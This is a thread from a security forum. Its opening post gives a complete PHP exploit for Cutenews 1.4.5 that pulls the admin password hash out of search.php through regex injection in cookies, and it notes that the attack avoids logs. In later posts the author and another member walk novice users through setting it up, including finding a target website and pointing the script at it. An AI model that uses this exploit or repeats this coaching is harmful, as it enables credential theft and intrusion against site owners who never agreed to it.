Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
August 26, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 253
Members: 0
Total: 253
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other software -> Cutenews <= 1.4.5 admin password md5 hash fetch exploit Goto page 1, 2, 3, 4  Next
Post new topic  Reply to topic View previous topic :: View next topic 
Cutenews <= 1.4.5 admin password md5 hash fetch exploit
PostPosted: Sun Dec 23, 2007 10:49 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Code:

<?php
error_reporting(E_ALL);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// Cutenews <= 1.4.5 admin password md5 hash fetching exploit
// Version 1.1
// written by Janek Vind "waraxe"
// http://www.waraxe.us
// 25. dec 2007
// Estonia, Tartu
//
// FEATURES:
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_COOKIE, so no log fear
// 3. Pretesting saves time if Cutenews is not vulnerable
//
// Version 1.1 -> pattern recognize improved
//
// More useful tools: http://www.waraxe.us/tools/
// Waraxe forums: http://www.waraxe.us/forums.html
//
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$target = 'http://localhost/cutenews.1.4.5/search.php';
$username = 'waraxe'; // Username is needed
$outfile = './cute_log.txt';// Log file
//=====================================================================
///////////////////////////////////////////////////////////////////////
// Don't mess below this line, unless you know the stuff ;)
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
$levels = array(1=>'admin',2=>'editor',3=>'journalist',4=>'commenter');
$start_time = time();
$requests = 0;
$cli = php_sapi_name() === 'cli';
//=====================================================================
// Warning, if executed from webserver
//=====================================================================
if(!$cli)
{
   if(!isset($_REQUEST['wtf-is-cli']))
   {
      echo "<html><head><title>Attention!</title></head>\n";
      echo "<body><br /><br /><center>\n";
      echo "<h1>Warning!</h1>\n";
      echo "This exploit is meant to be used as php CLI script!<br />\n";
      echo "More information:<br />\n";
      echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
      echo "Still, you can try to run it from webserver.<br />\n";
      echo "Just press the button below and prepare for long waiting<br />\n";
      echo "And learn to use php CLI next time, please ...<br />\n";
      echo "<form method=\"get\">\n";
      echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
      echo "</form>\n";
      echo "</center></body></html>\n";
      exit;
   }
   else
   {
      // Let's try to maximize our chances without CLI
      set_time_limit(0);
   }
}
//=====================================================================
add_logline("-------------------------------------------------------");
add_logline("Cutenews password md5 hash fetching started");
add_logline("Target: $target");
add_logline("Username: $username");

pre_test();

$h = get_hash();
$run_time = time() - $start_time;

add_logline("MD5 hash: $h");

xecho("\nFinal MD5 hash: $h", 1);
xecho("\nTotal time spent: $run_time seconds", 1);
xecho("HTTP requests made: $requests\n", 1);
xecho("Questions and feedback - http://www.waraxe.us/forums.html", 1);
xecho("See ya! :)", 1);

exit;
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function get_hash()
{
   $hash = '';
   
   for($i = 0; $i < 32; $i ++)
   {
      xecho("Finding hash char pos $i");
      $c = get_hash_char($i);
      $hash .= $c;
      xecho("Current hash: $hash");
   }
   
   return $hash;
}
///////////////////////////////////////////////////////////////////////
function get_hash_char($pos)
{
   global $username;
   
   $un = "^$username\$";
   $charset = '0123456789abcdef';
   
   $beg = '^';
   if($pos > 0)
   {
      $beg .= "([a-f0-9]{{$pos}})";
   }
   
   $end = '$';
   if($pos < 31)
   {
      $cnt = 31 - $pos;
      $end = "([a-f0-9]{{$cnt}})\$";
   }
   
   for($i = 8; $i > 0; $i >>= 1)
   {
      $first = substr($charset, 0, $i);
      $second = substr($charset, $i);      
      $hp = "$beg([$first])$end";

      if( make_query($un, $hp) === 1)
      {
         xecho("Position $pos: [$first]");
         $charset = $first;
      }
      else
      {
         xecho("Position $pos: [$second]");
         $charset = $second;
      }
   }
   
   return $charset;
}
///////////////////////////////////////////////////////////////////////
function pre_test()
{
   global $username;
   
   // Target URL valid?
   xecho("Validating target URL");
   if(strpos(make_get($GLOBALS['target']), 'search_in_archives') === false)
   {
      die('Target URL not valid!');
   }
   xecho("URL is valid");
   
   $un = "^$username\$";
   if( make_query($un) !== 1)
   {
      die('Pretest 1 failed - wrong username?');
   }
   else
   {
      xecho("Pretest 1 passed - username OK", 1);
   }

   $hp = '^[a-f0-9]{32}$';
   if( make_query($un, $hp) !== 1)
   {
      die('Pretest 2 failed - target not vulnerable?');
   }
   else
   {
      xecho("Pretest 2 passed - regex injection OK", 1);
   }

   $hp = '^[a-f0-9]{1337}$';
   if( make_query($un, $hp) !== 0)
   {
      die('Pretest 3 failed - target not vulnerable?');
   }
   else
   {
      xecho("Pretest 3 passed - regex injection OK", 1);
   }
}
///////////////////////////////////////////////////////////////////////
function make_query($username, $hashpattern = '')
{
   global $target;
   $max_retries = 10;
   
   $cookie = "dosearch=yes;files_arch[]=./data/users.db.php;title=$username";
   if(!empty($hashpattern))
   {
      $cookie .= ";story=$hashpattern";
   }
   
   for($retry = 0; $retry < $max_retries + 1; $retry ++)
   {
      if($retry > 0)
      {
         xecho("Request failed!", 1);
         xecho("Sleeping $retry seconds", 1);
         sleep($retry);
         xecho("Awake ...", 1);
         xecho("Retry #$retry", 1);
      }
      $buff = make_get($target, $cookie);
      $ret = preg_match('/\[[0-9]{1,6}\]:/',$buff,$hits);
      if($ret > 0)
      {
         $ret = intval(substr($hits[0], 1));
         if($ret > -1)
         {
            return $ret;
         }
      }
   }
   
   die('Fatal error - server down?');
}
///////////////////////////////////////////////////////////////////////
function make_get($url, $cookie = '', $referer = '', $headers = FALSE)
{
   $ch = curl_init();
   $timeout = 120;
   curl_setopt($ch, CURLOPT_URL, $url);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
   curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');
   
   if(!empty($cookie))
   {
      curl_setopt($ch, CURLOPT_COOKIE, $cookie);
   }
 
   if(!empty($referer))
   {
      curl_setopt($ch, CURLOPT_REFERER, $referer);
   }

   if($headers === TRUE)
   {
      curl_setopt($ch, CURLOPT_HEADER, TRUE);
   }
   else
   {
      curl_setopt($ch, CURLOPT_HEADER, FALSE);
   }

   $fc = curl_exec($ch);
   curl_close($ch);
   $GLOBALS['requests'] ++;
   
   return $fc;
}
//////////////////////////////////////////////////////////////////////
function add_logline($line)
{
   global $outfile;
   
   $line .= "\n";
   $fh = fopen($outfile, 'ab');
   fwrite($fh, $line);
   fclose($fh);
   
}
//////////////////////////////////////////////////////////////////////
function xecho($line, $both = 0)
{
   if($GLOBALS['cli'])
   {
      echo "$line\n";
   }
   elseif($both)
   {
      $line = nl2br(htmlspecialchars($line));
      echo "$line<br />\n";
   }
}
/////////////////////////////////////////////////////////////////////
?>


Feedback is welcome Cool


Last edited by waraxe on Mon Dec 24, 2007 11:07 pm; edited 3 times in total
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Dec 24, 2007 10:56 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Wow waraxe you are great dude.Very nice work and stupid bug.:)God blase you.;)Merry christmas.Wink
View user's profile Send private message
PostPosted: Mon Dec 24, 2007 12:18 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Merry Christmas Smile
View user's profile Send private message Send e-mail Visit poster's website
cant work out
PostPosted: Mon Dec 24, 2007 4:55 pm Reply with quote
theface
Active user
Active user
 
Joined: Dec 24, 2007
Posts: 33




i am running the script on windows machine. and when i try to connect to local machine it works. but when i try to connect to a remote server it gives me server timeout.

"Fatal errror - server down?"


any suggestions ?
View user's profile Send private message
Re: cant work out
PostPosted: Mon Dec 24, 2007 6:00 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




theface wrote:
i am running the script on windows machine. and when i try to connect to local machine it works. but when i try to connect to a remote server it gives me server timeout.

"Fatal errror - server down?"


any suggestions ?


This is the code fragment:

Code:

      if( ($x !== false) && ($y !== false) && ($x < $y) ) $buff = make_get($target, $cookie);
      $x = strpos($buff, '<b>Founded News articles [');
      $y = strpos($buff, ']:</b>', $x + 25);

      {
         $buff = trim(substr($buff, $x + 26, $y - $x - 26));
         $ret = intval($buff);
         if( ($ret > -1) && ($ret < 2) )
         {
            return $ret;
         }
      }
   }
   
   die('Fatal errror - server down?');



So this error message can be little bit misguiding, sorry ...
It means, that server response does not contain "Founded News articles " pattern as expected. I tested my exploit script against many targets and it always worked. In your case this problem can be related to modified Cutenews scripts, so that output is different looking, or there are other malfunctions. I suggest you to write some debugging code right after make_get() function. Example:

Code:

$buff = make_get($target, $cookie);
//===========
die("Debug: $buff");
//===========
      $x = strpos($buff, '<b>Founded News articles [');
      $y = strpos($buff, ']:</b>', $x + 25);


In this way you can see in plain text details of server response, and if there is any error messages, like "cannot open file" or something like that, then feel free to post details here. Maybe i am able to help.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Dec 24, 2007 6:18 pm Reply with quote
theface
Active user
Active user
 
Joined: Dec 24, 2007
Posts: 33




actually i think the problem is
Code:

$buff = make_get($target, $cookie);
//===========
die("Debug: $buff");
//===========
      $x = strpos($buff, '<b>[b]Founded News articles [/b][');
      $y = strpos($buff, ']:</b>', $x + 25);


instead of the Founded New Articles they have changed it to come in a different font i mean so its not coming with that it gives that text in another langugage.

so can that be a problem ?

"
Code:

Debug: HTTP/1.0 200 OK Date: Mon, 24 Dec 2007 18:14:18 GMT Server: Apache Content-Type: text/html X-Cache: MISS from proxy104.rol.net.mv X-Cache-Lookup: MISS from proxy104.rol.net.mv:8080 Via: 1.0 proxy104.rol.net.mv:8080 (squid/2.6.STABLE5) Connection: close
 
ޚަބަރު;  <------ THIS IS neWS
 
 
ޞުރުހީ  <--------- THIS IS TITLE
 
ލިޔުންތެރިޔާ   <------ THIS IS WRITER
ދުވަހުން  12345678910111213141516171819202122232425262728293031 JanFebMarAprMayJunJulAugSepOctNovDec 20032004200520062007200820092010
ދުވަހަށް  12345678910111213141516171819202122232425262728293031JanFebMarAprMayJunJulAugSepOctNovDec20032004200520062007200820092010 
ކުރީގެ ޚަބަރުވެސް ހޯދާ  <------ THIS IS LOOK IN ARCHIVES
 
 
  އެޑްވާންސް    <----- THIS IS ADVANCE
 


ފެނުނު އާޓިކަލް؛ [35]:


this is what i am getting now. any suggestions?

ފެނުނު އާޓިކަލް؛ [35 <----- this is "Founded News articles [0]:"
View user's profile Send private message
PostPosted: Mon Dec 24, 2007 10:08 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Look like arabic shitt's.
View user's profile Send private message
PostPosted: Mon Dec 24, 2007 10:50 pm Reply with quote
theface
Active user
Active user
 
Joined: Dec 24, 2007
Posts: 33




koko wrote:
Look like arabic shitt's.



No its MAldivian. called Dhivehi.
View user's profile Send private message
PostPosted: Mon Dec 24, 2007 11:01 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




I got it work. I was making pattern recognize code more flexible.
Just look at exploits posted above - i have made changes and now its version 1.1 Smile

And of course - feedback is welcome - let me know if it works Cool
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Jan 13, 2008 5:18 pm Reply with quote
onez
Regular user
Regular user
 
Joined: Jan 12, 2008
Posts: 5




can i get a detailed explanation on how i can set this up and get it going... thank u
View user's profile Send private message
PostPosted: Sun Jan 13, 2008 9:01 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




onez wrote:
can i get a detailed explanation on how i can set this up and get it going... thank u


First download php for windows:

http://www.php.net/downloads.php

Maybe this version is best choice:

http://ee2.php.net/get/php-5.2.5-win32-installer.msi/from/a/mirror

Install it - now you have php in your home PC.
Next copy-paste php code from my exploit and put it in to text file "cutemd5.php". That's the exploit script in php language.
And finally - search for target. You must have url to target website's "search.php" script. Something like this:

Code:
http://localhost/cutenews.1.4.5/search.php


After you have done all these preparations, come back here and let me know. And then i will explain, how to run the exploit.

Onemore thing to do - change username in script to the target's username.


Last edited by waraxe on Mon Jan 14, 2008 5:59 pm; edited 2 times in total
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Jan 13, 2008 11:03 pm Reply with quote
onez
Regular user
Regular user
 
Joined: Jan 12, 2008
Posts: 5




i downloaded the php

i copied and pasted the code and its in a .php file

i found a target
View user's profile Send private message
PostPosted: Mon Jan 14, 2008 12:26 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Now edit your exploit script.
Search for this:

Code:

$target = 'http://localhost/cutenews.1.4.5/search.php';


and change to your target, example:

Code:

$target = 'http://www.mytarget.com/search.php';


Next create new text file "go.cmd" and write there "cmd".
After saving that file it's icon should look in windows like old "bat" file. It means, that this file is windows shell script file.
Now double-click on "go.cmd" to execute it.
You should see black window - command prompt.
Type "php" and look, what happens. If PATH parameter is set correctly, then you should see no error messages. If PATH is not set as needed, then error message will show up.

Please try this steps and let me know about results.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Jan 14, 2008 12:53 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




My way.

Create new .txt file and put inside this.

Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\cmd]
@="Open DOS here"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\cmd\command]
@="cmd.exe /k\"set path=%path%;z:\\\\tools&&cd  %L\\\""


Rename this .txt to somename.reg.Rigth click on file>>Merge.

Next.Go to php folder.Right click on php folder "Open DOS here".This is open command prompt.Next open folder where you save your exploit.Type in prompt

example:

php.exe K:\myfolder\myexploit.php

..and press Enter
View user's profile Send private message
PostPosted: Mon Jan 14, 2008 1:55 pm Reply with quote
onez
Regular user
Regular user
 
Joined: Jan 12, 2008
Posts: 5




waraxe wrote:
Now edit your exploit script.
Search for this:

Code:

$target = 'http://localhost/cutenews.1.4.5/search.php';


and change to your target, example:

Code:

$target = 'http://www.mytarget.com/search.php';


Next create new text file "go.cmd" and write there "cmd".
After saving that file it's icon should look in windows like old "bat" file. It means, that this file is windows shell script file.
Now double-click on "go.cmd" to execute it.
You should see black window - command prompt.
Type "php" and look, what happens. If PATH parameter is set correctly, then you should see no error messages. If PATH is not set as needed, then error message will show up.

Please try this steps and let me know about results.


OK i did all that and got no error

whats the next steps
View user's profile Send private message
Cutenews <= 1.4.5 admin password md5 hash fetch exploit
  www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 4  
Goto page 1, 2, 3, 4  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






It book reviews
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.074 Seconds